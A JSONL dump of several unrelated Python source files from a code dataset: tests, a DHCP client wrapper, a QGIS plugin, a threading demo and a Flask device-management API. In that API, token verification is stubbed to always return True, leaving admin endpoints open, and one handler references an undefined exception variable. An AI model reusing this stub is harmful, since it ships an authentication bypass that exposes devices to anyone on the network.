list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setInt8Array(intArray)\n arraysMapping.setInt16Array(intArray)\n arraysMapping.setInt32Array(intArray)\n arraysMapping.setInt64Array(intArray)\n\n def testUnsignedBitfieldArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setBitfield8Array(intArray)\n arraysMapping.setBitfield16Array(intArray)\n arraysMapping.setBitfield32Array(intArray)\n arraysMapping.setBitfield63Array(intArray)\n arraysMapping.setUint8Value(8)\n arraysMapping.setVariableBitfieldLongArray(intArray)\n arraysMapping.setVariableBitfieldIntArray(intArray)\n arraysMapping.setVariableBitfieldShortArray(intArray)\n arraysMapping.setVariableBitfieldByteArray(intArray)\n\n def testSignedBitfieldArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setIntfield8Array(intArray)\n arraysMapping.setIntfield16Array(intArray)\n arraysMapping.setIntfield32Array(intArray)\n arraysMapping.setIntfield64Array(intArray)\n arraysMapping.setUint8Value(8)\n arraysMapping.setVariableIntfieldLongArray(intArray)\n arraysMapping.setVariableIntfieldIntArray(intArray)\n arraysMapping.setVariableIntfieldShortArray(intArray)\n arraysMapping.setVariableIntfieldByteArray(intArray)\n\n def testFloatArrays(self):\n arraysMapping = self.api.ArraysMapping()\n floatArray = [i / (i + 1) for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setFloat16Array(floatArray)\n arraysMapping.setFloat32Array(floatArray)\n arraysMapping.setFloat64Array(floatArray)\n\n def testVariableUnsignedIntegerArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setVaruint16Array(intArray)\n arraysMapping.setVaruint32Array(intArray)\n arraysMapping.setVaruint64Array(intArray)\n arraysMapping.setVaruintArray(intArray)\n arraysMapping.setVarsizeArray(intArray)\n\n def testVariableSignedIntegerArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setVarint16Array(intArray)\n arraysMapping.setVarint32Array(intArray)\n arraysMapping.setVarint64Array(intArray)\n arraysMapping.setVarintArray(intArray)\n\n def testBoolArray(self):\n arraysMapping = self.api.ArraysMapping()\n boolArray = [i % 2 == 0 for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setBoolArray(boolArray)\n\n def testStringArrays(self):\n arraysMapping = self.api.ArraysMapping()\n stringArray = [\"Test\" + str(i) for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setStringArray(stringArray)\n\n def testExternArrays(self):\n arraysMapping = self.api.ArraysMapping()\n externArray = [zserio.BitBuffer(bytes([0xCD, 0x03]), 10)\n for i in range(self.FIXED_ARRAY_LENGTH)]\n arraysMapping.setExternArray(externArray)\n\n def testCompoundArray(self):\n arraysMapping = self.api.ArraysMapping()\n compoundArray = [self.api.TestStructure() for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setCompoundArray(compoundArray)\n\n def testEnumArray(self):\n arraysMapping = self.api.ArraysMapping()\n enumArray = [self.api.TestEnum(self.api.TestEnum.VALUE1) for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setEnumArray(enumArray)\n\n def testBitmaskArray(self):\n arraysMapping = self.api.ArraysMapping()\n bitmaskArray = [self.api.TestBitmask.Values.MASK1 for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setBitmaskArray(bitmaskArray)\n\n FIXED_ARRAY_LENGTH = 5\n","sub_path":"test/language/array_types/python/ArraysMappingTest.py","file_name":"ArraysMappingTest.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"389848976","text":"from enum import Enum\nimport ipaddress\nimport json\nimport struct\nimport binascii\nimport os\nfrom os import path\nfrom select import select\nimport threading\nimport subprocess\nimport logging\n\nfrom eventfd import EventFD\nimport posix_ipc\n\nHANDLER_SCRIPT = path.join(path.dirname(__file__), 'udhcpc_handler.py')\nAWAIT_INTERVAL = 0.1\nVENDOR_ID = 'docker'\n\nclass EventType(Enum):\n BOUND = 'bound'\n RENEW = 'renew'\n DECONFIG = 'deconfig'\n LEASEFAIL = 'leasefail'\n\nlogger = logging.getLogger('net-dhcp')\n\nclass DHCPClientError(Exception):\n pass\n\ndef _nspopen_wrapper(netns):\n return lambda cmd, *args, **kwargs: subprocess.Popen(['nsenter', f'-n{netns}', '--'] + cmd, *args, **kwargs)\nclass DHCPClient:\n def __init__(self, iface, v6=False, once=False, hostname=None, event_listener=None):\n self.iface = iface\n self.v6 = v6\n self.once = once\n self.event_listeners = [DHCPClient._attr_listener]\n if event_listener:\n self.event_listeners.append(event_listener)\n\n self.netns = None\n if 'netns' in iface:\n self.netns = iface['netns']\n logger.debug('udhcpc using netns %s', self.netns)\n\n Popen = _nspopen_wrapper(self.netns) if self.netns else subprocess.Popen\n bin_path = '/usr/bin/udhcpc6' if v6 else '/sbin/udhcpc'\n cmdline = [bin_path, '-s', HANDLER_SCRIPT, '-i', iface['ifname'], '-f']\n cmdline.append('-q' if once else '-R')\n if hostname:\n cmdline.append('-x')\n if v6:\n # TODO: We encode the fqdn for DHCPv6 because udhcpc6 seems to be broken\n # flags: S bit set (see RFC4704)\n enc_hostname = hostname.encode('utf-8')\n enc_hostname = struct.pack('BB', 0b0001, len(enc_hostname)) + enc_hostname\n enc_hostname = binascii.hexlify(enc_hostname).decode('ascii')\n hostname_opt = f'0x27:{enc_hostname}'\n else:\n hostname_opt = f'hostname:{hostname}'\n cmdline.append(hostname_opt)\n if not v6:\n cmdline += ['-V', VENDOR_ID]\n\n self._suffix = '6' if v6 else ''\n self._event_queue = posix_ipc.MessageQueue(f'/udhcpc{self._suffix}_{iface[\"address\"].replace(\":\", \"_\")}', \\\n flags=os.O_CREAT | os.O_EXCL, max_messages=2, max_message_size=1024)\n self.proc = Popen(cmdline, env={'EVENT_QUEUE': self._event_queue.name}, stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n if hostname:\n logger.debug('[udhcpc%s#%d] using hostname \"%s\"', self._suffix, self.proc.pid, hostname)\n\n self._has_lease = threading.Event()\n self.ip = None\n self.gateway = None\n self.domain = None\n\n self._shutdown_event = EventFD()\n self.shutdown = False\n self._event_thread = threading.Thread(target=self._read_events)\n self._event_thread.start()\n\n def _attr_listener(self, event_type, event):\n if event_type in (EventType.BOUND, EventType.RENEW):\n self.ip = ipaddress.ip_interface(event['ip'])\n if 'gateway' in event:\n self.gateway = ipaddress.ip_address(event['gateway'])\n else:\n self.gateway = None\n self.domain = event.get('domain')\n self._has_lease.set()\n elif event_type == EventType.DECONFIG:\n self._has_lease.clear()\n self.ip = None\n self.gateway = None\n self.domain = None\n\n def _read_events(self):\n while True:\n r, _w, _e = select([self._shutdown_event, self._event_queue.mqd], [], [])\n if self._shutdown_event in r:\n break\n\n msg, _priority = self._event_queue.receive()\n event = json.loads(msg.decode('utf-8'))\n try:\n event['type'] = EventType(event['type'])\n except ValueError:\n logger.warning('udhcpc%s#%d unknown event \"%s\"', self._suffix, self.proc.pid, event)\n continue\n\n logger.debug('[udhcp%s#%d event] %s', self._suffix, self.proc.pid, event)\n for listener in self.event_listeners:\n try:\n listener(self, event['type'], event)\n except Exception as ex:\n logger.exception(ex)\n self.shutdown = True\n del self._shutdown_event\n\n def await_ip(self, timeout=10):\n if not self._has_lease.wait(timeout=timeout):\n raise DHCPClientError(f'Timed out waiting for lease from udhcpc{self._suffix}')\n\n return self.ip\n\n def finish(self, timeout=5):\n if self.shutdown or self._shutdown_event.is_set():\n return\n\n try:\n if self.proc.returncode is not None and (not self.once or self.proc.returncode != 0):\n raise DHCPClientError(f'udhcpc{self._suffix} exited early with code {self.proc.returncode}')\n if self.once:\n self.await_ip()\n else:\n self.proc.terminate()\n\n if self.proc.wait(timeout=timeout) != 0:\n raise DHCPClientError(f'udhcpc{self._suffix} exited with non-zero exit code {self.proc.returncode}')\n\n return self.ip\n finally:\n self._shutdown_event.set()\n self._event_thread.join()\n self._event_queue.close()\n self._event_queue.unlink()\n","sub_path":"net-dhcp/udhcpc.py","file_name":"udhcpc.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423236555","text":"# -*- coding: utf-8 -*-\n'''\n/***************************************************************************\n Historisation\n A QGIS plugin\n Historisation par SITN\n -------------------\n begin : 2019-08-01\n git sha : $Format:%H$\n copyright : (C) 2015 by arx iT\n email : mba@arxit.com\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n'''\nfrom __future__ import absolute_import\nfrom builtins import object\nfrom qgis.core import *\nfrom qgis.PyQt.QtCore import QSettings, QTranslator, qVersion, QCoreApplication\nfrom qgis.PyQt.QtWidgets import QAction, QPushButton, QMenu\nfrom qgis.PyQt.QtGui import QIcon\n# Initialize Qt resources from file resources.py\nfrom . import resources\nfrom .project import *\nfrom .settings import defineDBSettings\n\n# Import the code for the dialog\nimport os.path\n\n# Global variables\nPLUGIN_DIR = os.path.dirname(__file__)\n\n\nclass Historisation(object):\n '''\n QGIS Plugin Implementation.\n '''\n\n def __init__(self, iface):\n '''Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n '''\n\n # Save reference to the QGIS interface\n self.iface = iface\n\n # Register custom editors widgets\n\n # Declare instance attributes\n self.actions = []\n self.temp_actions = []\n self.menu = u'&Historisation'\n\n # Toolbar initialization\n self.toolbar = self.iface.addToolBar(u'Historisation')\n self.toolbar.setObjectName(u'Historisation')\n\n # QGIS interface hooks\n self.iface.projectRead.connect(self.onProjectOpened)\n self.iface.newProjectCreated.connect(self.onProjectOpened)\n\n # Load current project\n self.current_project = Project(self.iface)\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n '''Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. Note that the action is also\n added to self.actions list.\n :rtype: QAction\n '''\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n if callback is not None:\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n self.toolbar.addAction(action)\n\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n '''\n Create the menu entries and toolbar icons inside the QGIS GUI.\n '''\n\n definedDB = QSettings().value(\"HistorisationSITN/DB\", None)\n enable_button = False\n if definedDB:\n enable_button = True\n\n # New project\n self.add_action(\n ':/plugins/Historisation/widgets/configuration/icon.png',\n text=u'Activer l\\'historisation sur la couche',\n callback=self.onConfigurationButtonClicked,\n status_tip=u'Activer l\\'historisation sur la couche',\n enabled_flag=enable_button,\n parent=self.iface.mainWindow())\n\n self.add_action(\n ':/plugins/Historisation/widgets/configuration/icon_settings.png',\n text=u'Définir les paramètres de connexion à la BD',\n callback=self.onSettingsButtonClicked,\n status_tip=u'Définir les paramètres de connexion à la BD',\n parent=self.iface.mainWindow())\n\n\n # Update buttons availability\n self.updateGui()\n\n def updateGui(self):\n '''\n Updates the plugin GUI\n Disable buttons\n '''\n enabled = True\n\n for action in self.temp_actions:\n action.setEnabled(enabled)\n\n def onProjectOpened(self):\n self.current_project = Project(self.iface)\n\n def onConfigurationButtonClicked(self):\n if not self.current_project:\n return\n\n self.current_project.activateHistoryOnSelectedLayer()\n\n def onSettingsButtonClicked(self):\n\n defineDBSettings(self)\n\n def unload(self):\n '''\n Removes the plugin menu item and icon from QGIS GUI.\n '''\n\n for action in self.actions:\n self.iface.removePluginMenu(\n self.menu,\n action)\n self.iface.removeToolBarIcon(action)\n\n # remove the toolbar\n del self.toolbar\n\n # Disconnect Signals\n self.iface.projectRead.disconnect(self.onProjectOpened)\n self.iface.newProjectCreated.disconnect(self.onProjectOpened)\n","sub_path":"Historisation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"25316360","text":"from gluoncv.data.transforms import video\nfrom gluoncv.data import VideoClsCustom\ndef video_transform(root, video_path, train=False, test_mode=False):\n if train == True:\n transform_train = video.VideoGroupTrainTransform(size=(224, 224), scale_ratios=[1.0, 0.8], mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n train_dataset = VideoClsCustom(root=root,\n setting=video_path,\n train=True,\n test_mode=False,\n #num_segments=3,\n new_length=8,\n transform=transform_train,\n #video_loader=True,\n #use_decord=True\n )\n print('Load %d training samples.' % len(train_dataset))\n\n elif train == False and test_mode == True:\n transform_train = video.VideoGroupValTransform(size=(224, 224), mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n train_dataset = VideoClsCustom(root=root,\n setting=video_path,\n train=False,\n test_mode=True,\n #num_segments=3,\n new_length=8,\n transform=transform_train,\n #video_loader=True,\n #use_decord=True\n )\n print('Load %d testing samples.' % len(train_dataset))\n return train_dataset\n\n","sub_path":"for_application/video_config.py","file_name":"video_config.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441298121","text":"### Author Douwe Spaanderman - 27 May 2020 ###\n\n# This script runs the whole prefiltering of Terra workspace data depending on which Arguments are inserted\n\n# Libraries\nimport pandas as pd\nimport os\nimport numpy as np\nfrom pathlib import Path\nimport argparse\nimport time\n\ndef read_terra(input_loc):\n '''\n read the tsv file from terra, make string columns for nan\n\n input:\n input_loc = Path object with the location\n\n output:\n terra workspace data\n '''\n data = pd.read_csv(input_loc, sep=\"\\t\", index_col=0)\n data[\"PANEL_renamed_bai_file\"] = [str(x) for x in data[\"PANEL_renamed_bai_file\"]]\n data[\"RNA_fastq1\"] = [str(x) for x in data[\"RNA_fastq1\"]]\n \n return data\n\ndef filter_nan_sequence(data, selection=\"PANEL\"):\n '''\n Filters out all rows which have NaN values for the selected sequencing information\n\n input:\n data = terra workspace data\n selection = any of the following: Panel/Wes/RNA/All\n\n output:\n filtered dataframe with only compleet cases\n '''\n if type(selection) == str:\n if selection.upper() == \"PANEL\":\n data = data[data[\"PANEL_renamed_bai_file\"] != 'nan']\n elif selection.upper() == \"RNA\":\n data = data[data[\"RNA_fastq1\"] != 'nan']\n elif selection.upper() == \"WES\":\n raise SyntaxError(\"Currently not implemented\")\n elif selection.upper() == \"ALL\":\n data = data[(data[\"PANEL_renamed_bai_file\"] != 'nan') & (data[\"RNA_fastq1\"] != 'nan')]\n else:\n raise NameError(f\"Implemented unused argument for filtering data, input was {selection}, but should be panel/wes/rna/all\")\n else:\n raise TypeError(\"filter_nan_sequencing was provided with a {}, while it should be a string\".format(type(selection)))\n\n return data\n\ndef datafilter(Path, Save=False, Filter=\"PANEL\"):\n '''\n Main script to run data filtering\n\n input:\n Path = location to terra workspace file\n Save = If to save and where (default is False)\n Filter = any of the following: Panel/Wes/RNA/All (default is Panel)\n\n output:\n filtered dataframe with only compleet cases\n '''\n\n data = read_terra(input_loc = Path)\n data = filter_nan_sequence(data=data, selection=Filter)\n\n if Save != False:\n if not Save.endswith(\".pkl\"):\n try:\n Save = Save + \"filtered.pkl\"\n except:\n os.mkdir(Save)\n Save = Save + \"filtered.pkl\"\n\n data.to_pickle(Save)\n\n return data\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"filter data\")\n parser.add_argument(\"Path\", help=\"path to terra workspace file\")\n parser.add_argument(\"-s\", dest=\"Save\", nargs='?', default=False, help=\"location of file\")\n parser.add_argument(\"-f\", dest=\"Filter\", nargs='?', default='PANEL', help=\"which sequencing you want to select (RNA/WES/PANEL)\")\n\n args = parser.parse_args()\n start = time.time()\n data = datafilter(Path=args.Path, Save=args.Save, Filter=args.Filter)\n end = time.time()\n print('completed in {} seconds'.format(end-start))","sub_path":"CellCulturePy/Preprocessing/data_filter.py","file_name":"data_filter.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"469479387","text":"#!/usr/local/bin/python\n# a tutorial reproduced from https://pymotw.com/2/threading/\nimport logging, threading, time\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s (%(threadName)-2s) %(message)s', )\n\ndef consumer(cond):\n\t\"\"\"Waiting for the condition, then use the resource\"\"\"\n\tlogging.debug('Starting consumer thread')\n\tt = threading.currentThread()\n\twith cond:\n\t\tcond.wait()\n\t\tlogging.debug('Resource is available for the consumer')\n\ndef producer(cond):\n\t\"\"\"Set up the resource to be used by the consumer\"\"\"\n\tlogging.debug('Starting producer thread')\n\twith cond:\n\t\tlogging.debug('Making resource available')\n\t\tcond.notifyAll()\n\ncondition = threading.Condition()\n\nc1 = threading.Thread(name='c1', target=consumer, args=(condition,))\nc2 = threading.Thread(name='c2', target=consumer, args=(condition,))\np = threading.Thread(name='p', target=producer, args=(condition,))\n\nc1.start()\ntime.sleep(2)\nc2.start()\ntime.sleep(2)\np.start()\n\n\n","sub_path":"multithreading/threading_condition_synchronize.py","file_name":"threading_condition_synchronize.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"192113197","text":"from flask import Flask, request, jsonify, send_file\nfrom flask_httpauth import HTTPTokenAuth\nfrom fileUtil import image_monitor_device, convert_image_to_base64\nfrom dateUtil import get_current_date_str, get_current_short_date_str, set_time\nfrom dbUtil import modify_configuration_value, get_config_value, insert_download_code, count_available_download_codes, maintenance_token_exists, get_used_codes, get_used_codes_without_downloads, mark_codes_as_sent, get_config_value\nfrom logger import latest_log_activity, log_info, log_error\nimport time\nimport json\n\nAPI_MANAGEMENT_PORT = 0\nPATH_VIDEO_LOCALIZATION = ''\nPATH_PICTURES_LOCALIZATION = ''\n\n#Constantes de la base de datos\ndef update_variables():\n global API_MANAGEMENT_PORT\n global PATH_VIDEO_LOCALIZATION\n global PATH_PICTURES_LOCALIZATION\n API_MANAGEMENT_PORT = int(get_config_value(\"API_MANAGEMENT_PORT\"))\n PATH_VIDEO_LOCALIZATION = get_config_value(\"VIDEO_LOCALIZATION_PATH\")\n PATH_PICTURES_LOCALIZATION = get_config_value(\"PICTURES_LOCALIZATION_PATH\")\n\napp = Flask(__name__)\nauth = HTTPTokenAuth('Token')\n\n\n#172.24.1.1:5002/getTime\n@app.route('/getTime', methods=['GET', 'POST'])\n@auth.login_required\ndef get_time():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - get_time()')\n\n response = {\n \"status\":\"ok\",\n \"currentTime\": time.strftime('%H') + \":\" + time.strftime('%M')}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - get_time()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorGettingTime\",\n \"errorMessage\":\"No se pudo obtener la hora del dispositivo\",\n \"exception\":str(e)}\n return jsonify(response)\n\n\n#172.24.1.1:5002/postTime\n@app.route('/postTime', methods=['POST'])\n@auth.login_required\ndef post_time():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - post_time()')\n\n hora = request.form.get(\"time\")\n horaPI = hora.split(':')[0]\n minutosPI = hora.split(':')[1]\n set_time(horaPI, minutosPI)\n response = {\n \"status\":\"ok\",\n \"newTime\":time.strftime('%H') + \":\" + time.strftime('%M')}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - post_time()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorSettingTime\",\n \"errorMessage\":\"No se pudo modificar la hora del dispositivo\",\n \"exception\":str(e)}\n return jsonify(response)\n\n \n#172.24.1.1:5002/changeRecordingTimes\n@app.route('/setRecordingTimes', methods=['POST'])\n@auth.login_required\ndef set_recording_times():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - set_recording_times()')\n \n startTime = request.form.get(\"startTime\")\n endTime = request.form.get(\"endTime\")\n modify_configuration_value(\"START_RECORDING_TIME\", startTime)\n modify_configuration_value(\"FINISH_RECORDING_TIME\", endTime)\n response = {\"status\":\"ok\"}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - set_recording_times()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorChangingRecordingTimes\",\n \"errorMessage\":\"No se pudo modificar las horas de grabacion\",\n \"exception\":str(e)}\n return jsonify(response)\n\n \n#172.24.1.1:5002/getRecordingTimes\n@app.route('/getRecordingTimes', methods=['POST'])\n@auth.login_required\ndef get_recording_times():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - get_recording_times()')\n \n startTime = get_config_value(\"START_RECORDING_TIME\")\n endTime = get_config_value(\"FINISH_RECORDING_TIME\")\n response = {\n \"status\":\"ok\",\n \"startTime\":startTime,\n \"endTime\":endTime}\n return jsonify(response)\n except:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - get_recording_times()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorGettingRecordingTimes\",\n \"errorMessage\":\"No se pudo obtener las horas de grabacion\",\n \"exception\":str(e)}\n return jsonify(response)\n\n\n#172.24.1.1:5002/getImageMonitorDevice\n@app.route('/getImageMonitorDevice', methods=['GET', 'POST'])\n@auth.login_required\ndef get_image_monitor_device():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - get_image_monitor_device()')\n\n update_variables()\n picture_path = PATH_PICTURES_LOCALIZATION + get_current_date_str() + \".jpg\"\n video_directory = PATH_VIDEO_LOCALIZATION + get_current_short_date_str()\n image_monitor_device(video_directory, picture_path)\n encoded_string = convert_image_to_base64(picture_path)\n return jsonify({\"status\":\"ok\", \"base64Image\":encoded_string})\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - get_image_monitor_device()', str(e))\n return jsonify({\n \"status\":\"error\",\n \"error\":\"errorMonitoringDevice\",\n \"errorMessage\":\"Error inesperado\",\n \"exception\":str(e)})\n\n\n#172.24.1.1:5002/uploadCodes\n@app.route('/uploadCodes', methods=['GET', 'POST'])\n@auth.login_required\ndef upload_codes():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - upload_codes()')\n\n codes = json.loads(request.form.get(\"codes\"))\n for code in codes:\n insert_download_code(code['code'])\n return jsonify({\n \"status\":\"ok\",\n \"codes\":codes}) \n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - upload_codes()', str(e))\n return jsonify({\n \"status\":\"error\",\n \"error\":\"errorUploadingCodes\",\n \"errorMessage\":\"Error inesperado\",\n \"exception\":str(e)})\n\n\n#172.24.1.1:5002/countCodes\n@app.route('/countCodes', methods=['GET', 'POST'])\n@auth.login_required\ndef count_codes():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - count_codes()')\n \n count = count_available_download_codes()\n ##TODO obtener deviceId \n deviceId = 1\n return jsonify({\n \"status\":\"ok\",\n \"count\":count,\n \"deviceId\":deviceId}) \n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - count_codes()', str(e))\n return jsonify({\n \"status\":\"error\",\n \"error\":\"errorCountingAvailableCodes\",\n \"errorMessage\":\"Error inesperado\",\n \"exception\":str(e)})\n\n\n#172.24.1.1:5002/getSpaceLimits\n@app.route('/getSpaceLimits', methods=['POST'])\n@auth.login_required\ndef get_space_limits():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - get_space_limits()')\n \n startLimit = get_config_value(\"DISK_START_DELETE_SPACE\")\n endLimit = get_config_value(\"DISK_STOP_DELETE_SPACE\")\n min_space = request.form.get(\"min_space\")\n max_space = request.form.get(\"max_space\")\n response = {\n \"status\":\"ok\",\n \"startLimit\":startLimit,\n \"endLimit\":endLimit}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - get_space_limits()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorChangingSpaceLimits\",\n \"errorMessage\":\"No se pudo modificar los limites de espacio\",\n \"exception\":str(e)}\n return jsonify(response)\n\n \n#172.24.1.1:5002/setSpaceLimits\n@app.route('/setSpaceLimits', methods=['POST'])\n@auth.login_required\ndef set_space_limits():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - set_space_limits()')\n \n startLimit = int(request.form.get(\"startLimit\"))\n endLimit = int(request.form.get(\"endLimit\"))\n log_info(email, '***** startLimit', str(startLimit))\n log_info(email, '***** endLimit', str(endLimit))\n if(startLimit < endLimit):\n if(startLimit >= 1024):\n if(endLimit <= 15360):\n modify_configuration_value(\"DISK_START_DELETE_SPACE\", str(startLimit))\n modify_configuration_value(\"DISK_STOP_DELETE_SPACE\", str(endLimit))\n response = {\"status\":\"ok\"}\n else:\n response = {\n \"status\":\"error\",\n \"error\":\"invalidMaxLimit\",\n \"errorMessage\":\"El limite para terminar de borrar no puede ser superior a 15 GB\"}\n else:\n response = {\n \"status\":\"error\",\n \"error\":\"invalidMinLimit\",\n \"errorMessage\":\"El limite para empezar a borrar no puede ser menor a 1 GB\"}\n else:\n response = {\n \"status\":\"error\",\n \"error\":\"invalidValues\",\n \"errorMessage\":\"El limite para empezar a borrar debe ser menor al limite para terminar\"}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - set_space_limits()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorChangingSpaceLimits\",\n \"errorMessage\":\"No se pudo modificar los limites de espacio\",\n \"exception\":str(e)}\n return jsonify(response)\n\n\n#172.24.1.1:5002/downloadData\n@app.route('/downloadData', methods=['POST'])\n@auth.login_required\ndef download_data():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - download_data()')\n \n usedCodes = get_used_codes()\n usedCodesWithoutDownloads = get_used_codes_without_downloads()\n logActivity = latest_log_activity()\n mark_codes_as_sent()\n response = {\n \"status\":\"ok\",\n \"usedCodes\":usedCodes,\n \"usedCodesWithoutDownload\":usedCodesWithoutDownloads,\n \"logActivity\":logActivity}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - download_data()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorDownloadingData\",\n \"errorMessage\":\"No se pudieron descargar los datos\",\n \"exception\":str(e)}\n return jsonify(response)\n \n@auth.verify_token\ndef verify_token(token):\n ##return maintenance_token_exists(token) \n return True\n \n\n@auth.error_handler\ndef auth_error():\n response = jsonify({\n \"status\":\"error\",\n \"error\":\"wrongToken\",\n \"errorMessage\":\"Usted no esta autorizado a realizar esta accion\"})\n response.status_code = 200\n return response\n\n\nif __name__ == '__main__':\n update_variables()\n app.run(debug=True, host='172.24.1.1', port=API_MANAGEMENT_PORT)\n","sub_path":"Scripts/apiManagement.py","file_name":"apiManagement.py","file_ext":"py","file_size_in_byte":11898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"31666742","text":"# -*- coding: utf-8 -*-\nimport uno\nimport unohelper\n\nfrom traceback import format_exc as tb\nimport sys\nimport os\nimport xml.etree.ElementTree as ElementTree\nimport time\nfrom codecs import open as codecs_open\nfrom math import floor as math_floor\nimport re\nimport konstanten as KONST\nimport copy\nimport inspect\nfrom pprint import pformat\nimport webbrowser\n\n\nplatform = sys.platform\n\n\n\nclass Menu_Bar():\n \n def __init__(self,args,tab = 'Projekt'):\n \n try:\n \n (pdk,\n dialog,\n ctx,\n tabsX,\n path_to_extension,\n win,\n dict_sb,\n debugX,\n factory,\n menu_start,\n logX,\n class_LogX,\n settings_organon) = args\n\n \n 